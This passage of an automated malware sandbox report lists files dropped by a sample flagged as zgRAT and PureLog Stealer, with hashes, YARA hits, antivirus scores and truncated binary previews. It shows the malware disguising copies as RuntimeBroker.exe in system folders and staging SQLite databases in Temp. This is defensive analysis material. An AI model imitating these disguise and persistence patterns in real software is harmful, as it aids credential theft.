                                                                                                                          SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                          SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                          SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                          C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Program Files\Internet Explorer\SIGNUP\9e8d7a4ca61bd9

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):192
                                                                                                                          Entropy (8bit):5.729984983501638
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:MfxCWS99+8fiEMEXukU9ZXPMRHUnG/AmVKhIOMgVjXKfCGOLE:M5VS99+8iEXrUwHw+KuOTUfCGOw
                                                                                                                          MD5:E83F059843DE0D263119E64970D2115C
                                                                                                                          SHA1:6E6A3AE0F1A50E25FEEBB6A1EEDCEB2C4F474D43
                                                                                                                          SHA-256:616D1369DA89873EB037BAFD6AE80633BC4CB4C478F679E8C68C307336A44E65
                                                                                                                          SHA-512:CDDD5EE2DC20CB4D6E1DF5E7DBEE5ABBAE7623F3A7FF591AD3B612AF888AC11A3E76A4C14CF676854B6F543A96E910496383F7740B0D341C5CF870436EA1ED21
                                                                                                                          Malicious:false
                                                                                                                          Preview:YxlwJewahvZ5J3QptBx3ZoRIPqNuFyzSQs0iFjpH8iaSgbjQaXPKAswtfdhdRCVt6GpaDrjKWp40O9mxG6TsioSi6GDmCLz6NqWZwJNtxFyUx5fg0tXUsmKRyHe6o6HKz8mimNB6tk4c07uAlgwTyeNkfFkooQF18ofzT73nsalIsra1XdVHKyVUuCChnWRd

                                                                                                                          C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1914880
                                                                                                                          Entropy (8bit):7.534170827701139
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                          MD5:86AF92730370230540800E6D509E4155
                                                                                                                          SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                          SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                          SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                          C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Program Files\Windows Security\9e8d7a4ca61bd9

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):145
                                                                                                                          Entropy (8bit):5.667868966666222
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:F8HtOHEPcTvDTUBrrhadnWwPOLkVhRUVdUdLRXUsI7iPefRflGsBrnvUn:F8H4kkHgBrrQlWwGLqU3ELRPI70AWSrM
                                                                                                                          MD5:BA4BB618CEDE7408C3E6545C4EE36E53
                                                                                                                          SHA1:BE68CE239BEB49B75F666EBB6802E9E3043436DF
                                                                                                                          SHA-256:E21A7480CDD7827B8735425C1257907D3ED6A8B94805E572696018804C2A15E8
                                                                                                                          SHA-512:AD0C5998ED9DFDE08DB526FD8A4CD3C78BBAB0131E39C340C004AB46D6AA2EC4614C873B01D94C4DA86C7F6A7C2F06953ABCC8163FE01FE9A1BBC6A69ACE023D
                                                                                                                          Malicious:false
                                                                                                                          Preview:oHGYbHgkuiWp7QaBZVQqpyEPy6m7f6zJDGd12aNDSQ38B3QYoHUxuKd0D0keejFxtMl0xjI8INXY4FO5pOTXlCZ2nmxB0sitLGPyRalF8WogwE67mpzPQrLrxsNKvGIZooNx0anPnNZPX2Giq

                                                                                                                          C:\Program Files\Windows Security\RuntimeBroker.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1914880
                                                                                                                          Entropy (8bit):7.534170827701139
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                          MD5:86AF92730370230540800E6D509E4155
                                                                                                                          SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                          SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                          SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                          C:\Program Files\Windows Security\RuntimeBroker.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:CSV text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):847
                                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\U1jaLbTw1f.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1396
                                                                                                                          Entropy (8bit):5.350961817021757
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                          Malicious:true
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UserOOBEBroker.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                                                                                                                          File Type:CSV text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):847
                                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mGDcgYSpPaqkzVyIrStmzarQirIs.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe
                                                                                                                          File Type:CSV text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):847
                                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                          C:\Users\user\AppData\Local\Temp\2qdNqm8uni

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7M8FYD4Jot

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\ATu8gpifmd

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\CxkAYQrPy2

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Maj81930IG

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\PVn1d09MYf

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25
                                                                                                                          Entropy (8bit):4.213660689688185
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:5RkhwzRzn:5awJn
                                                                                                                          MD5:52204E54394058DDD462F3F2B4400C75
                                                                                                                          SHA1:F9DF8D3BCF99969AC81D37E605A6FDFD79A9515E
                                                                                                                          SHA-256:C269ED4D79120F438F67FF0F229795EAAF1FCAB05989A5C4298D1144607EC724
                                                                                                                          SHA-512:B2661C4414E85F6E639DAFA3B91F298788013583B8E380156353B4A8C677F6AC1B410EA3444AB27A9E2090B27159C270C2446D6D2804857A32EFB1F536024E29
                                                                                                                          Malicious:false
                                                                                                                          Preview:CI8OImMPl2YD4D3m1FVQZAqmV

                                                                                                                          C:\Users\user\AppData\Local\Temp\PvceyD0k9Q

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
